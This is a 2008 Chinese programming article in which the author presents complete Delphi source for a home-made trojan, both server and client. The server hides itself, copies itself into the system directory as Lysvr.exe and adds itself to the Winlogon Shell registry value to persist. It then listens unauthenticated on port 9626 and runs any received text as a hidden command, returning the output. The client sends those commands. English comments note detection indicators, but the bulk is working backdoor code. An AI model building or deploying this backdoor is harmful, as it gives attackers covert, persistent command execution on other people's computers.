Delphi下“培养”自己的简单木马

  • 来源: 编程中国 作者: 若水   2008-05-04/16:12
  • 刚学电脑时很喜欢网络安全,看着高手们写的一个又一个攻击工具,自己也总想努力去学好编程去写属于自己的程序。学DELPHI快一年了,感觉什么都没学到,惭愧啊。今晚突然想学着写木马,于是手忙脚乱的敲了点代码,超简单,愿自己能越写越好!!!

     

    程序跟传统木马一样,分服务端和客户端。运行服务端后会复制自身到SYSTEM32目录下面,并在注册表添加一个自动启动项,打开本机9626端口开始等待接收客户端的数据。当接收到客户端数据时就当作CMD命令去执行,最后把回显传送回客户端。客户端很简单,跟服务端连接成功后,输入命令点执行,正常的话可以收到服务端的执行结果了。

     

    MM

    源码如下:

    ////Server.pas//////////////

    unit UtMain;

    ////////////////////////////////////
    //////////BY lanyus////////////////
    ////////Email:greathjw@163.com////
    ////////QQ:231221////////////////
    ///部分代码从网上收集///////////
    ////////////////////////////////

    interface

    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, Registry, ScktComp, StdCtrls;

    type
      { Server-side main form (kept hidden, see FormCreate).  Everything the
        program does lives in the three event handlers declared here:
        FormCreate installs persistence and opens the listener, SSAccept greets
        a new client, SSClientRead runs the text a client sends and returns the
        captured output. }
      TFmMain = class(TForm)
        SS: TServerSocket;    // listening socket; its Port is set to 9626 in FormCreate
        Memo1: TMemo;         // scratch buffer for captured command output; Memo1.Text is what gets sent back
        procedure FormCreate(Sender: TObject);
        procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
        procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      FmMain: TFmMain;   // global instance of the server form
      reg:TRegistry;     // unit-global registry object; in this unit it is only created and freed inside FormCreate

    implementation

    {$R *.dfm}

    { Runs once when the form is created.  From a defender's point of view this
      is where every host-based indicator of the sample is produced:
        - the Winlogon "Shell" value is rewritten to 'Explorer.exe Lysvr.exe'
        - a copy of the executable is written to <system directory>\Lysvr.exe
        - a TCP listener is opened on port 9626
      None of the API calls below has its result checked; the only error
      handling is the try/except around SS.Active, which swallows the error. }
    procedure TFmMain.FormCreate(Sender: TObject);
    var
    sysdir:array[0..50] of char;   // receives the system directory path (GetSystemDirectory is told it holds 50 chars)
    begin
      Application.ShowMainForm:=False;
      FmMain.Left:=-200;          // keep the window from being shown at run time
      reg:=TRegistry.Create;
      reg.RootKey:=HKEY_LOCAL_MACHINE;
      // HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell normally
      // holds just "Explorer.exe"; appending Lysvr.exe makes it start with every
      // interactive logon.  Auditing this value for anything other than the
      // default is the simplest way to detect this persistence technique.
      reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
      if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
        reg.WriteString('Shell','Explorer.exe Lysvr.exe');   // create the logon autostart entry
      reg.Free;
      GetSystemDirectory(sysdir,50);
      // Self-copy under a fixed name into the system directory; the file name
      // and location are a second static indicator.  Both this write and the
      // HKLM write above typically need administrative rights.
      if not FileExists(sysdir+'\Lysvr.exe') then
        copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

      SS.Port:=9626;        // fixed listening port: the network indicator for this sample
      try
        SS.Active:=True;    // start listening; any failure (e.g. port already in use) is ignored
      except
      end;
    end;

    { Fired for every accepted connection.  No authentication of any kind takes
      place; the new client only receives this fixed greeting.  The literal
      bytes of the string below therefore appear at the start of every session,
      which makes the service easy to fingerprint on the wire. }
    procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
    begin
      Socket.SendText('连接成功');   // send a "connected" banner to the new client
    end;

    { Fired whenever a connected client sends data.  The received text is used
      verbatim as the command line for CreateProcess, the child's stdout is
      captured through an anonymous pipe into Memo1, and Memo1.Text is sent back.
      There is no validation, allow-list or authentication between ReceiveText
      and CreateProcess: anyone who can reach port 9626 runs commands in the
      security context of this process.  Only hStdOutput is redirected;
      hStdError and hStdInput are left untouched.  The variable res is declared
      but never used. }
    procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
    var
    RemoteCmd:string;                 // raw text received from the client
    hReadPipe,hWritePipe:THandle;     // anonymous pipe: the child writes, this procedure reads
    si:STARTUPINFO;
    lsa:SECURITY_ATTRIBUTES;          // marks the pipe handles inheritable so the child can use them
    pi:PROCESS_INFORMATION;
    cchReadBuffer:DWORD;              // bytes available (PeekNamedPipe) / bytes read (ReadFile)
    ph:PChar;                         // 5000-byte read buffer
    fname:PChar;                      // 255-byte copy of the command line handed to CreateProcess
    res:string;
    begin
      Memo1.Clear;
      remotecmd:=Socket.ReceiveText;
      fname:=allocmem(255);
      ph:=AllocMem(5000);
      lsa.nLength  :=sizeof(SECURITY_ATTRIBUTES);
      lsa.lpSecurityDescriptor  :=nil;
      lsa.bInheritHandle  :=True;
      if  CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false  then
      begin
        socket.SendText('不能创建管道');   // "cannot create pipe"
        exit;
      end;
      fillchar(si,sizeof(STARTUPINFO),0);
      si.cb:=sizeof(STARTUPINFO);
      si.dwFlags:=(STARTF_USESTDHANDLES  or  STARTF_USESHOWWINDOW);
      si.wShowWindow:=SW_HIDE;           // child runs without a visible window
      si.hStdOutput:=hWritePipe;         // child's stdout goes into the pipe
      StrPCopy(fname,remotecmd);
      // Execute the received text directly as a command line
      if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
      begin
        socket.SendText('不能创建进程');   // "cannot create process"
        FreeMem(ph);
        FreeMem(fname);
        Exit;
      end;
      // Poll the pipe until the child has exited and nothing is left to read
      while(true)  do
      begin
      if  not  PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil)  then  break;
      if  cchReadBuffer<>0  then
      begin
      if  ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false  then  break;
        ph[cchReadbuffer]:=chr(0);   // NUL-terminate the chunk before treating it as a PChar
        Memo1.Lines.Add(ph);
      end
      else
      if(WaitForSingleObject(pi.hProcess  ,0)=WAIT_OBJECT_0)  then  break;   // pipe empty and child finished
        Sleep(100);
      end;
      ph[cchReadBuffer]:=chr(0);
      Memo1.Lines.Add(ph);    // Memo1 accumulates the captured output
      CloseHandle(hReadPipe);  // "#p#分页标题#e#" on this line in the page is a site page-break marker, not source
      CloseHandle(pi.hThread);
      CloseHandle(pi.hProcess);
      CloseHandle(hWritePipe);
      FreeMem(ph);
      FreeMem(fname);
      socket.SendText(Memo1.Text);  // return the captured output to the client
    end;

    end.

    ///////////////////////////////////////////////////////////////////////////////////////////

    //////客户端/////////////////////

    unit UtMain;

    ////////////////////////////////////
    //////////BY lanyus////////////////
    ////////Email:greathjw@163.com////
    ////////QQ:231221////////////////
    ////////////////////////////////

    interface

    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,
      IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

    type
      { Client side: a plain TClientSocket front end.  Edit2/Edit3 supply host
        and port, Edit4 the text to send, Memo1 shows the latest reply.
        WebBrowser1 is not referenced by any handler in this unit, and neither
        are the Indy UDP and TLHelp32 units listed in the uses clause. }
      TFmMain = class(TForm)
        WebBrowser1: TWebBrowser;   // declared but unused in this unit
        Label3: TLabel;
        Edit2: TEdit;               // server host (read in Button2Click)
        Label4: TLabel;
        Edit3: TEdit;               // server port, parsed with StrToInt in Button2Click
        Button2: TButton;           // opens the connection
        CS: TClientSocket;
        Edit4: TEdit;               // text sent to the server by BitBtn2Click
        Label5: TLabel;
        Memo1: TMemo;               // replaced with the newest reply on every CSRead
        BitBtn2: TBitBtn;           // sends Edit4
        procedure Button2Click(Sender: TObject);
        procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
        procedure BitBtn2Click(Sender: TObject);
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      FmMain: TFmMain;   // global instance of the client form

    implementation

    {$R *.dfm}

    { Connects CS to the host/port typed into Edit2/Edit3.  StrToInt raises on a
      non-numeric port and nothing here catches it or checks the connect result. }
    procedure TFmMain.Button2Click(Sender: TObject);
    begin
      CS.Host:=Edit2.Text;
      CS.Port:=StrToInt(Edit3.Text);
      CS.Open;
    end;

    { Called when data arrives from the server.  The memo is cleared first, so
      only the most recent reply is ever visible. }
    procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
    begin
      Memo1.Clear;
      Memo1.Lines.Add(Socket.ReceiveText);
      Memo1.Lines.Add('');   // trailing blank line after the reply
    end;

    { Sends the contents of Edit4 to the server as-is; there is no check that
      CS is connected before SendText is called. }
    procedure TFmMain.BitBtn2Click(Sender: TObject);
    begin
      CS.Socket.SendText(edit4.Text);
    end;

    end.

